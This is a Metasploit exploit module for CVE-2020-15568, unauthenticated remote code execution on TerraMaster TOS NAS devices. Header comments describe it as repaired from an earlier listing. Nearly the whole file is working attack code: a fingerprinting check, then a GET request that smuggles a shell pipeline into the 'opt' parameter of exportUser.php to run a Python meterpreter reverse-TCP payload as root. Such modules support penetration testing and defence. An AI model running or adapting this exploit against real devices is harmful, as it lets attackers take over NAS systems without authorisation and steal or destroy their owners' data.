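##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated remote code execution against TerraMaster TOS <= 4.1.24
# (CVE-2020-15568) via the dynamic class/method invocation in
# include/exportUser.php. Fixes relative to the listing this was taken from:
# the 'Author' and 'References' arrays were missing element separators and the
# closing bracket of 'Author' (the module could not be loaded as written),
# `exploit` discarded the result of `check`, and `check` reported Safe when the
# probe got no response at all.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata and user options. RPORT defaults to 8181 and TARGETURI to
  # the directory that holds exportUser.php.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => "TerraMaster TOS <= 4.1.24 Remote Code Execution",
      'Description'    => %q{
        This module exploits the remote code execution vulnerability of TerraMaster TOS.
        By exploiting this vulnerability, unauthenticated users can execute arbitrary code
        under the root user. A dynamic class method invocation vulnerability exists in file
        include/exportUser.php which leads to executing remote commands on TerraMaster
        devices with root privileges. The vulnerable file requires several HTTP GET
        parameters to be provided in order to reach method call and exploit this
        vulnerability. On first line application includes app.php which autoloads relevant
        core classes of TOS software. The application decides operation based on value of
        GET parameter type. If value of type variable is something different than 1 or 2,
        then it’s possible to reach vulnerable code. Source code of exportUser.php,
        application requires HTTP GET parameters cla (shorthand for class), func and opt.
        During code review of other files as well, it has been found that there is a way to
        exploit this issue with pre-existing classes in TOS software. PHP Class located in
        include/class/application.class.php is best candidate to execute commands on
        devices that runs TOS software. Since exportUser.php has no authentication
        controls, it’s possible for unauthenticated attacker to reach code Execution
        This module was tested against 4.1.24 and below versions.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Murat Yilmazlar ', # Vulnerability discovery and Metasploit module
          'Canberk Bolat '    # Vulnerability discovery
        ],
      'References'     =>
        [
          ['CVE', 'CVE-2020-15568'],
          ['URL', 'https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/']
        ],
      'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' },
      'Platform'       => ['python'],
      'Arch'           => [ARCH_PYTHON],
      'Targets'        => [['Automatic Target', {}]],
      # NOTE(review): the description states commands run as root, yet Privileged
      # is false; if the resulting session really is root this should be true --
      # confirm against a device before changing it.
      'Privileged'     => false,
      'DisclosureDate' => "Jun 22 2020",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(8181),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/include'])
      ]
    )
  end

  # Request exportUser.php without the parameters the script expects. A
  # vulnerable build surfaces the dynamic class invocation as an uncaught PHP
  # error in the response body; that string is the fingerprint.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the fingerprint is present,
  #   Unknown when no response came back at all, Safe otherwise.
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'exportUser.php')
    }, 60)

    # A timeout or refused connection is not evidence that the host is patched.
    return Exploit::CheckCode::Unknown unless res

    if res.body.to_s.include?('Fatal error: Uncaught Error: Class name must be a valid object')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Deliver the payload through the unauthenticated method-invocation path in
  # exportUser.php. The verdict of `check` is honoured: a definitive Safe
  # aborts, an Unknown is reported and the attempt proceeds.
  def exploit
    verdict = check
    if verdict == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, 'Target does not appear to be vulnerable')
    elsif verdict == Exploit::CheckCode::Unknown
      print_warning('Could not determine whether the target is vulnerable; continuing anyway')
    end

    print_status("Attempting to execute the payload...")

    # The HTTP reply is not inspected: with the default reverse_tcp payload the
    # incoming session, not the response body, is what signals success.
    send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, 'exportUser.php'),
      'vars_get' => {
        'type' => "3",
        'cla'  => "application",
        'func' => "_exec",
        'opt'  => "1'| python -c \"#{payload.encoded}\" | grep '1"
      }
    })
  end
end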